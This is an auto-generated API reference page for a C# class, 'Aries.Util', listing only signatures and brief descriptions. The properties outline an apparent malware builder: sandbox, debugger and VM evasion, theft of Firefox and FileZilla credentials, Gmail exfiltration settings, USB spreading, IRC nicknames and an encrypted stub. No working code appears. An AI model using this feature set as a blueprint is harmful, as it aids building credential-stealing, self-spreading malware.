C# Класс Aries.Util

Показать файл Открыть проект

Открытые свойства

Свойство Тип Описание
AESClass SimpleAES
AntiSandbox bool
AntiSniffDebug bool
AntiSysinternals bool
AntiVirtual bool
CrashType int
DisplayErrorMsg bool
DisplayInVirtual bool
EncryptHost bool
ErrorBody string
ErrorTitle string
FSplit string
FSplit2 string
FSplit3 string
FSplit4 string
GmailPass string
GmailUser string
OriginalSize int
PackedSize int
ProtectNum string
SendFirefoxFilezilla bool
USBSpread bool
UseRandomNick bool
compressed bool
encryptionkey byte[]
file1TargetFileOutput string
msgIcon string
stub string

Открытые методы

Метод Описание
IsProcessRunning ( string file_name ) : bool

Check for a process name and window title

Reverse ( string x ) : string

Reverse a string

getRandNum ( int length ) : string

Return a string of random letters (removed numbers for more compatible use)

Приватные методы

Метод Описание
GetModuleHandle ( string lpModuleName ) : IntPtr

Описание методов

IsProcessRunning() публичный статический Метод

Check for a process name and window title
public static IsProcessRunning ( string file_name ) : bool
file_name string Process or window title to check for
Результат bool

Reverse() публичный статический Метод

Reverse a string
public static Reverse ( string x ) : string
x string String to reverse
Результат string

getRandNum() публичный статический Метод

Return a string of random letters (removed numbers for more compatible use)
public static getRandNum ( int length ) : string
length int Length of random string to return
Результат string

Описание свойств

AESClass публичное статическое свойство

public static SimpleAES AESClass
Результат SimpleAES

AntiSandbox публичное статическое свойство

Anti Sandboxie
public static bool AntiSandbox
Результат bool

AntiSniffDebug публичное статическое свойство

Anti Sniffers/Debuggers
public static bool AntiSniffDebug
Результат bool

AntiSysinternals публичное статическое свойство

Anti Sysinternals products
public static bool AntiSysinternals
Результат bool

AntiVirtual публичное статическое свойство

Anti Virtual Environment
public static bool AntiVirtual
Результат bool

CrashType публичное статическое свойство

Numeric value for the way that the program will end itself
public static int CrashType
Результат int

DisplayErrorMsg публичное статическое свойство

Anti Sandboxie
public static bool DisplayErrorMsg
Результат bool

DisplayInVirtual публичное статическое свойство

Display the error msg if it's enabled and if running in a Virtual Environement
public static bool DisplayInVirtual
Результат bool

EncryptHost публичное статическое свойство

Encrypt the host file?
public static bool EncryptHost
Результат bool

ErrorBody публичное статическое свойство

Body of the error msg to display if enabled
public static string ErrorBody
Результат string

ErrorTitle публичное статическое свойство

Title of the error msg to display if enabled
public static string ErrorTitle
Результат string

FSplit публичное статическое свойство

public static string FSplit
Результат string

FSplit2 публичное статическое свойство

public static string FSplit2
Результат string

FSplit3 публичное статическое свойство

public static string FSplit3
Результат string

FSplit4 публичное статическое свойство

public static string FSplit4
Результат string

GmailPass публичное статическое свойство

Gmail Password
public static string GmailPass
Результат string

GmailUser публичное статическое свойство

Gmail Username
public static string GmailUser
Результат string

OriginalSize публичное статическое свойство

Original size of the target file
public static int OriginalSize
Результат int

PackedSize публичное статическое свойство

public static int PackedSize
Результат int

ProtectNum публичное статическое свойство

public static string ProtectNum
Результат string

SendFirefoxFilezilla публичное статическое свойство

Send Firefox/Filezilla info after running 1st time
public static bool SendFirefoxFilezilla
Результат bool

USBSpread публичное статическое свойство

Spread to USB drives after running 1st time
public static bool USBSpread
Результат bool

UseRandomNick публичное статическое свойство

use a random irc nick
public static bool UseRandomNick
Результат bool

compressed публичное статическое свойство

Compress the target file?
public static bool compressed
Результат bool

encryptionkey публичное статическое свойство

Encryption key used for AES
public static byte[] encryptionkey
Результат byte[]

file1TargetFileOutput публичное статическое свойство

The target file contents, stored in a string
public static string file1TargetFileOutput
Результат string

msgIcon публичное статическое свойство

public static string msgIcon
Результат string

stub публичное статическое свойство

string to store the stub in
public static string stub
Результат string